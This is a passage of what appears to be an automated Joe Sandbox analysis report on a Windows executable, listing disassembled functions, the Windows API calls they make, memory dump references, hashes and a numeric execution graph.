                                                                                                                                                                        Function 00007FF6E944A0B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6E944A0FC
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D46E
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D485
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D4EE
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: iswspace.MSVCRT ref: 00007FF6E942D54D
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D569
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D58C
                                                                                                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6E944A1FB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                                                                                        • String ID: Software\Classes
                                                                                                                                                                        • API String ID: 2714550308-1656466771
                                                                                                                                                                        • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                                                                                        • Instruction ID: 7c1d0d01b2f236c1d2ffef7783b3edce314f6b54d6d7df4a4ac6db3461184ace
                                                                                                                                                                        • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D419C23A09B62D1EB00DF16D44563963A4FF85BD0F508131DE5EC37A5EE3AE88AC709
                                                                                                                                                                        Function 00007FF6E942CAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleTitle
                                                                                                                                                                        • String ID: -
                                                                                                                                                                        • API String ID: 3358957663-3695764949
                                                                                                                                                                        • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                                                                        • Instruction ID: 3a60c092abcbd971b29546b1336eca61d18b1a132e2828b74c432a3209b373e5
                                                                                                                                                                        • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                                                                        • Instruction Fuzzy Hash: 8731A163A08742C2EA14DF21A8046786AA4FF49F91F545235DD0E87BD6DF3EE449C30E
                                                                                                                                                                        Function 00007FF6E9437280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsnicmpswscanf
                                                                                                                                                                        • String ID: :EOF
                                                                                                                                                                        • API String ID: 1534968528-551370653
                                                                                                                                                                        • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                                                                                        • Instruction ID: 2d1bef405d7cfb3846757791ce6190d270f5984144e6dbcad9d7d129a98a2a47
                                                                                                                                                                        • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                                                                                        • Instruction Fuzzy Hash: E831AD33A1CA46C6FB24DF75A8443B872A0EF44B50F444131EA8D86291DF3EEA49C70A
                                                                                                                                                                        Function 00007FF6E9423BE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsnicmp
                                                                                                                                                                        • String ID: /-Y
                                                                                                                                                                        • API String ID: 1886669725-4274875248
                                                                                                                                                                        • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                                                                                        • Instruction ID: 1655e4901edd684456386f8b6fe436d5a820228f0c1084cfe40d765b97cfb170
                                                                                                                                                                        • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                                                                                        • Instruction Fuzzy Hash: 4B216B67A08766C1EB209F069454378B7A0BF58FC0F448031DE9887794DE3EE89AD70A
                                                                                                                                                                        Function 00007FF6E942B62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 3$3
                                                                                                                                                                        • API String ID: 0-2538865259
                                                                                                                                                                        • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                                                                        • Instruction ID: cee0916306b73ef24a22d1c29d116b7304dfb9867761d6d495ce26164fcd177c
                                                                                                                                                                        • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                                                                        • Instruction Fuzzy Hash: 8C0117B3D2A582CAF3198F6098843783660BF56311F944235C41EC25A2EF3FA48CC74B
                                                                                                                                                                        Function 00007FF6E94306C0 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306D6
                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306F0
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E943074D
                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E9430762
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1617791916-0
                                                                                                                                                                        • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                                                                        • Instruction ID: 9413b77cc577ea127f21def1436a65c560e4248cdff187de32ad99cfebdd5d5d
                                                                                                                                                                        • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D414CB3A19742C6EA158F20E44827EB7A0FF85B80F548634DA4D83755DF3EE448C74A

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:5.7%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                        Total number of Nodes:637
                                                                                                                                                                        Total number of Limit Nodes:23
                                                                                                                                                                        execution_graph 16719 7ff6e9438d80 16720 7ff6e9438da4 16719->16720 16721 7ff6e9438db6 16720->16721 16722 7ff6e9438dbf Sleep 16720->16722 16723 7ff6e9438ddb _amsg_exit 16721->16723 16725 7ff6e9438de7 16721->16725 16722->16720 16723->16725 16724 7ff6e9438e56 _initterm 16727 7ff6e9438e73 _IsNonwritableInCurrentImage 16724->16727 16725->16724 16726 7ff6e9438e3c 16725->16726 16725->16727 16733 7ff6e94337d8 GetCurrentThreadId OpenThread 16727->16733 16766 7ff6e94304f4 16733->16766 16735 7ff6e9433839 HeapSetInformation RegOpenKeyExW 16736 7ff6e943e9f8 RegQueryValueExW RegCloseKey 16735->16736 16737 7ff6e943388d 16735->16737 16739 7ff6e943ea41 GetThreadLocale 16736->16739 16738 7ff6e9435920 VirtualQuery VirtualQuery 16737->16738 16740 7ff6e94338ab GetConsoleOutputCP GetCPInfo 16738->16740 16742 7ff6e9433919 16739->16742 16740->16739 16741 7ff6e94338f1 memset 16740->16741 16741->16742 16742->16736 16743 7ff6e9434d5c 391 API calls 16742->16743 16744 7ff6e9433948 _setjmp 16742->16744 16745 7ff6e943eb27 _setjmp 16742->16745 16746 7ff6e9434c1c 166 API calls 16742->16746 16747 7ff6e9448530 370 API calls 16742->16747 16748 7ff6e9423240 166 API calls 16742->16748 16749 7ff6e94301b8 6 API calls 16742->16749 16750 7ff6e943eb71 _setmode 16742->16750 16751 7ff6e94386f0 182 API calls 16742->16751 16752 7ff6e9430580 12 API calls 16742->16752 16754 7ff6e94358e4 EnterCriticalSection LeaveCriticalSection 16742->16754 16756 7ff6e942be00 647 API calls 16742->16756 16757 7ff6e942df60 481 API calls 16742->16757 16758 7ff6e94358e4 EnterCriticalSection LeaveCriticalSection 16742->16758 16743->16742 16744->16742 16745->16742 16746->16742 16747->16742 16748->16742 16749->16742 16750->16742 16751->16742 16753 7ff6e943398b GetConsoleOutputCP GetCPInfo 16752->16753 16755 7ff6e94304f4 GetModuleHandleW GetProcAddress SetThreadLocale 16753->16755 16754->16742 16755->16742 16756->16742 16757->16742 16759 7ff6e943ebbe GetConsoleOutputCP GetCPInfo 16758->16759 16760 7ff6e94304f4 GetModuleHandleW GetProcAddress SetThreadLocale 16759->16760 16761 7ff6e943ebe6 16760->16761 16762 7ff6e942be00 647 API calls 16761->16762 16763 7ff6e9430580 12 API calls 16761->16763 16762->16761 16764 7ff6e943ebfc GetConsoleOutputCP GetCPInfo 16763->16764 16765 7ff6e94304f4 GetModuleHandleW GetProcAddress SetThreadLocale 16764->16765 16765->16742 16768 7ff6e9430504 16766->16768 16767 7ff6e943051e GetModuleHandleW 16767->16768 16768->16767 16769 7ff6e943054d GetProcAddress 16768->16769 16770 7ff6e943056c SetThreadLocale 16768->16770 16769->16768 22176 7ff6e94299d0 22179 7ff6e94299f0 22176->22179 22180 7ff6e943b7df 22179->22180 22181 7ff6e9429a1b 22179->22181 22182 7ff6e942cd90 166 API calls 22181->22182 22183 7ff6e9429a25 22182->22183 22183->22180 22184 7ff6e9429a31 wcschr 22183->22184 22185 7ff6e9429a4e 22184->22185 22186 7ff6e943b7be 22184->22186 22216 7ff6e942df60 22185->22216 22191 7ff6e942cd90 166 API calls 22186->22191 22189 7ff6e9429a79 22192 7ff6e943b888 22189->22192 22194 7ff6e9429ae2 22189->22194 22196 7ff6e9429a9b 22189->22196 22190 7ff6e943b824 22190->22180 22193 7ff6e942b900 166 API calls 22190->22193 22206 7ff6e943b7d7 22191->22206 22200 7ff6e9423278 166 API calls 22192->22200 22195 7ff6e943b839 22193->22195 22198 7ff6e9429aeb wcschr 22194->22198 22199 7ff6e9429b01 22194->22199 22195->22180 22197 7ff6e943b841 _wcsupr 22195->22197 22196->22192 22201 7ff6e9429aa8 22196->22201 22202 7ff6e943b85f 22197->22202 22198->22199 22203 7ff6e9429b37 22198->22203 22204 7ff6e9429b0a wcschr 22199->22204 22205 7ff6e9429b20 22199->22205 22200->22180 22236 7ff6e94296e8 22201->22236 22211 7ff6e943b876 22202->22211 22212 7ff6e943b863 wcscmp 22202->22212 22260 7ff6e942c620 GetConsoleTitleW 22203->22260 22204->22203 22204->22205 22209 7ff6e9430a6c 273 API calls 22205->22209 22206->22180 22206->22206 22214 7ff6e942b6b0 170 API calls 22206->22214 22213 7ff6e9429b2e 22209->22213 22210 7ff6e94299dd 22215 7ff6e9423278 166 API calls 22211->22215 22212->22180 22212->22211 22213->22201 22213->22203 22214->22190 22215->22180 22217 7ff6e942dfe2 22216->22217 22218 7ff6e942df93 22216->22218 22220 7ff6e942e100 VirtualFree 22217->22220 22221 7ff6e942e00b _setjmp 22217->22221 22218->22217 22219 7ff6e942df9f GetProcessHeap RtlFreeHeap 22218->22219 22219->22217 22219->22218 22220->22217 22222 7ff6e9429a67 22221->22222 22223 7ff6e942e04a 22221->22223 22222->22189 22222->22190 22224 7ff6e942e600 473 API calls 22223->22224 22225 7ff6e942e073 22224->22225 22226 7ff6e942e0e0 longjmp 22225->22226 22227 7ff6e942e081 22225->22227 22235 7ff6e942e0b0 22226->22235 22228 7ff6e942d250 475 API calls 22227->22228 22229 7ff6e942e086 22228->22229 22232 7ff6e942e600 473 API calls 22229->22232 22229->22235 22233 7ff6e942e0a7 22232->22233 22234 7ff6e944d610 167 API calls 22233->22234 22233->22235 22234->22235 22235->22222 22303 7ff6e944d3fc 22235->22303 22237 7ff6e9429737 22236->22237 22239 7ff6e942cd90 166 API calls 22237->22239 22240 7ff6e942977d memset 22237->22240 22242 7ff6e943b76e 22237->22242 22243 7ff6e943b7b3 22237->22243 22245 7ff6e943b79a 22237->22245 22247 7ff6e942b364 17 API calls 22237->22247 22254 7ff6e94296b4 186 API calls 22237->22254 22255 7ff6e942986d 22237->22255 22351 7ff6e9431fac memset 22237->22351 22378 7ff6e942ce10 22237->22378 22428 7ff6e9435920 22237->22428 22239->22237 22241 7ff6e942ca40 17 API calls 22240->22241 22241->22237 22244 7ff6e9423278 166 API calls 22242->22244 22246 7ff6e943b787 22244->22246 22248 7ff6e943855c ??_V@YAXPEAX 22245->22248 22249 7ff6e943b795 22246->22249 22250 7ff6e944e944 393 API calls 22246->22250 22247->22237 22248->22243 22434 7ff6e9447694 22249->22434 22250->22249 22254->22237 22256 7ff6e942988c 22255->22256 22257 7ff6e9429880 ??_V@YAXPEAX 22255->22257 22258 7ff6e9438f80 7 API calls 22256->22258 22257->22256 22259 7ff6e942989d 22258->22259 22259->22210 22262 7ff6e942c675 22260->22262 22267 7ff6e942ca2f 22260->22267 22261 7ff6e943c5fc GetLastError 22261->22267 22263 7ff6e942ca40 17 API calls 22262->22263 22273 7ff6e942c69b 22263->22273 22264 7ff6e9423278 166 API calls 22264->22267 22265 7ff6e943855c ??_V@YAXPEAX 22265->22267 22266 7ff6e943291c 8 API calls 22291 7ff6e942c762 22266->22291 22267->22261 22267->22264 22267->22265 22268 7ff6e942c9b5 22272 7ff6e943855c ??_V@YAXPEAX 22268->22272 22269 7ff6e94289c0 23 API calls 22269->22291 22270 7ff6e942c978 towupper 22270->22291 22271 7ff6e943855c ??_V@YAXPEAX 22271->22291 22292 7ff6e942c855 22272->22292 22273->22267 22273->22268 22275 7ff6e942d3f0 223 API calls 22273->22275 22273->22291 22274 7ff6e943c60e 22277 7ff6e944ec14 173 API calls 22274->22277 22278 7ff6e942c741 22275->22278 22276 7ff6e942c872 22281 7ff6e943855c ??_V@YAXPEAX 22276->22281 22277->22291 22280 7ff6e942c74d 22278->22280 22283 7ff6e942c8b5 wcsncmp 22278->22283 22279 7ff6e943c6b8 SetConsoleTitleW 22279->22276 22284 7ff6e942bd38 207 API calls 22280->22284 22280->22291 22282 7ff6e942c87c 22281->22282 22285 7ff6e9438f80 7 API calls 22282->22285 22283->22280 22283->22291 22284->22291 22287 7ff6e942c88e 22285->22287 22286 7ff6e942c83d 22288 7ff6e942cb40 166 API calls 22286->22288 22287->22210 22290 7ff6e942c848 22288->22290 22289 7ff6e942c78a wcschr 22289->22291 22290->22292 22294 7ff6e942cad4 172 API calls 22290->22294 22291->22261 22291->22266 22291->22267 22291->22268 22291->22269 22291->22270 22291->22271 22291->22274 22291->22286 22291->22289 22293 7ff6e942ca25 22291->22293 22295 7ff6e943c684 22291->22295 22298 7ff6e942ca2a 22291->22298 22300 7ff6e942ca16 GetLastError 22291->22300 22292->22276 22292->22279 22296 7ff6e9423278 166 API calls 22293->22296 22294->22292 22297 7ff6e9423278 166 API calls 22295->22297 22296->22267 22297->22267 22299 7ff6e9439158 7 API calls 22298->22299 22299->22267 22302 7ff6e9423278 166 API calls 22300->22302 22302->22267 22304 7ff6e944d419 22303->22304 22305 7ff6e9433448 166 API calls 22304->22305 22306 7ff6e944d592 22304->22306 22308 7ff6e944d5c4 22304->22308 22309 7ff6e944d541 22304->22309 22317 7ff6e943cadf 22304->22317 22319 7ff6e944d3fc 166 API calls 22304->22319 22320 7ff6e944d555 22304->22320 22305->22304 22307 7ff6e9433448 166 API calls 22306->22307 22312 7ff6e944d5a5 22307->22312 22310 7ff6e9433448 166 API calls 22308->22310 22309->22306 22309->22308 22316 7ff6e944d546 22309->22316 22318 7ff6e944d589 22309->22318 22310->22317 22313 7ff6e944d5ba 22312->22313 22314 7ff6e9433448 166 API calls 22312->22314 22321 7ff6e944d36c 22313->22321 22314->22313 22316->22308 22316->22320 22318->22306 22318->22320 22319->22304 22328 7ff6e944d31c 22320->22328 22322 7ff6e944d3d8 22321->22322 22323 7ff6e944d381 22321->22323 22324 7ff6e94334a0 166 API calls 22323->22324 22327 7ff6e944d390 22324->22327 22325 7ff6e9433448 166 API calls 22325->22327 22326 7ff6e94334a0 166 API calls 22326->22327 22327->22322 22327->22325 22327->22326 22327->22327 22329 7ff6e9433448 166 API calls 22328->22329 22330 7ff6e944d33b 22329->22330 22331 7ff6e944d36c 166 API calls 22330->22331 22332 7ff6e944d343 22331->22332 22333 7ff6e944d3fc 166 API calls 22332->22333 22350 7ff6e944d34e 22333->22350 22334 7ff6e944d5c2 22334->22317 22335 7ff6e944d592 22336 7ff6e9433448 166 API calls 22335->22336 22341 7ff6e944d5a5 22336->22341 22337 7ff6e944d5c4 22339 7ff6e9433448 166 API calls 22337->22339 22338 7ff6e9433448 166 API calls 22338->22350 22339->22334 22340 7ff6e944d31c 166 API calls 22340->22334 22343 7ff6e944d5ba 22341->22343 22344 7ff6e9433448 166 API calls 22341->22344 22342 7ff6e944d546 22342->22337 22347 7ff6e944d555 22342->22347 22345 7ff6e944d36c 166 API calls 22343->22345 22344->22343 22345->22334 22346 7ff6e944d541 22346->22335 22346->22337 22346->22342 22348 7ff6e944d589 22346->22348 22347->22340 22348->22335 22348->22347 22349 7ff6e944d3fc 166 API calls 22349->22350 22350->22334 22350->22335 22350->22337 22350->22338 22350->22346 22350->22347 22350->22349 22352 7ff6e943203b 22351->22352 22353 7ff6e94320b0 22352->22353 22354 7ff6e9432094 22352->22354 22355 7ff6e9433060 171 API calls 22353->22355 22357 7ff6e943211c 22353->22357 22356 7ff6e94320a6 22354->22356 22358 7ff6e9423278 166 API calls 22354->22358 22355->22357 22360 7ff6e9438f80 7 API calls 22356->22360 22357->22356 22359 7ff6e9432e44 2 API calls 22357->22359 22358->22356 22362 7ff6e9432148 22359->22362 22361 7ff6e9432325 22360->22361 22361->22237 22362->22356 22363 7ff6e9432d70 3 API calls 22362->22363 22364 7ff6e94321af 22363->22364 22365 7ff6e942b900 166 API calls 22364->22365 22367 7ff6e94321d0 22365->22367 22366 7ff6e943e04a ??_V@YAXPEAX 22366->22356 22367->22366 22368 7ff6e943221c wcsspn 22367->22368 22377 7ff6e94322a4 ??_V@YAXPEAX 22367->22377 22369 7ff6e942b900 166 API calls 22368->22369 22371 7ff6e943223b 22369->22371 22371->22366 22374 7ff6e9432252 22371->22374 22372 7ff6e942d3f0 223 API calls 22372->22377 22373 7ff6e943e06d wcschr 22373->22374 22374->22373 22375 7ff6e943e090 towupper 22374->22375 22376 7ff6e943228f 22374->22376 22375->22374 22375->22376 22376->22372 22377->22356 22416 7ff6e942d0f8 22378->22416 22424 7ff6e942ce5b 22378->22424 22379 7ff6e9438f80 7 API calls 22382 7ff6e942d10a 22379->22382 22380 7ff6e943c860 22381 7ff6e943c97c 22380->22381 22383 7ff6e944ee88 390 API calls 22380->22383 22384 7ff6e944e9b4 197 API calls 22381->22384 22382->22237 22386 7ff6e943c879 22383->22386 22387 7ff6e943c981 longjmp 22384->22387 22385 7ff6e9430494 182 API calls 22385->22424 22388 7ff6e943c95c 22386->22388 22389 7ff6e943c882 EnterCriticalSection LeaveCriticalSection 22386->22389 22390 7ff6e943c99a 22387->22390 22388->22381 22395 7ff6e94296b4 186 API calls 22388->22395 22394 7ff6e942d0e3 22389->22394 22392 7ff6e943c9b3 ??_V@YAXPEAX 22390->22392 22390->22416 22391 7ff6e942df60 481 API calls 22393 7ff6e942ceaa _tell 22391->22393 22392->22416 22396 7ff6e942d208 _close 22393->22396 22394->22237 22395->22388 22396->22424 22397 7ff6e942cd90 166 API calls 22397->22424 22398 7ff6e943c9d5 22399 7ff6e944d610 167 API calls 22398->22399 22401 7ff6e943c9da 22399->22401 22400 7ff6e942b900 166 API calls 22400->22424 22402 7ff6e943ca07 22401->22402 22404 7ff6e944bfec 176 API calls 22401->22404 22403 7ff6e944e91c 198 API calls 22402->22403 22408 7ff6e943ca0c 22403->22408 22405 7ff6e943c9f1 22404->22405 22406 7ff6e9423240 166 API calls 22405->22406 22406->22402 22407 7ff6e942cf33 memset 22407->22424 22408->22237 22409 7ff6e942ca40 17 API calls 22409->22424 22410 7ff6e942d184 wcschr 22410->22424 22411 7ff6e944bfec 176 API calls 22411->22424 22412 7ff6e943c9c9 22414 7ff6e943855c ??_V@YAXPEAX 22412->22414 22413 7ff6e942d1a7 wcschr 22413->22424 22414->22416 22415 7ff6e944778c 166 API calls 22415->22424 22416->22379 22417 7ff6e9430a6c 273 API calls 22417->22424 22419 7ff6e9433448 166 API calls 22419->22424 22420 7ff6e942cfab _wcsicmp 22420->22424 22421 7ff6e9430580 12 API calls 22422 7ff6e942d003 GetConsoleOutputCP GetCPInfo 22421->22422 22423 7ff6e94304f4 3 API calls 22422->22423 22423->22424 22424->22380 22424->22385 22424->22390 22424->22391 22424->22394 22424->22397 22424->22398 22424->22400 22424->22407 22424->22409 22424->22410 22424->22411 22424->22412 22424->22413 22424->22415 22424->22416 22424->22417 22424->22419 22424->22420 22424->22421 22426 7ff6e9431fac 238 API calls 22424->22426 22427 7ff6e942d044 ??_V@YAXPEAX 22424->22427 22440 7ff6e942be00 22424->22440 22474 7ff6e944c738 22424->22474 22426->22424 22427->22424 22429 7ff6e943596c 22428->22429 22433 7ff6e9435a12 22428->22433 22430 7ff6e943598d VirtualQuery 22429->22430 22429->22433 22432 7ff6e94359ad 22430->22432 22430->22433 22431 7ff6e94359b7 VirtualQuery 22431->22432 22431->22433 22432->22431 22432->22433 22433->22237 22435 7ff6e94476a3 22434->22435 22436 7ff6e94476b7 22435->22436 22437 7ff6e94296b4 186 API calls 22435->22437 22438 7ff6e944e9b4 197 API calls 22436->22438 22437->22435 22439 7ff6e94476bc longjmp 22438->22439 22441 7ff6e942bec8 22440->22441 22442 7ff6e942be1b 22440->22442 22441->22424 22442->22441 22443 7ff6e942be47 memset 22442->22443 22444 7ff6e942be67 22442->22444 22513 7ff6e942bff0 22443->22513 22446 7ff6e942be73 22444->22446 22447 7ff6e942bf29 22444->22447 22450 7ff6e942beaf 22444->22450 22448 7ff6e942be92 22446->22448 22452 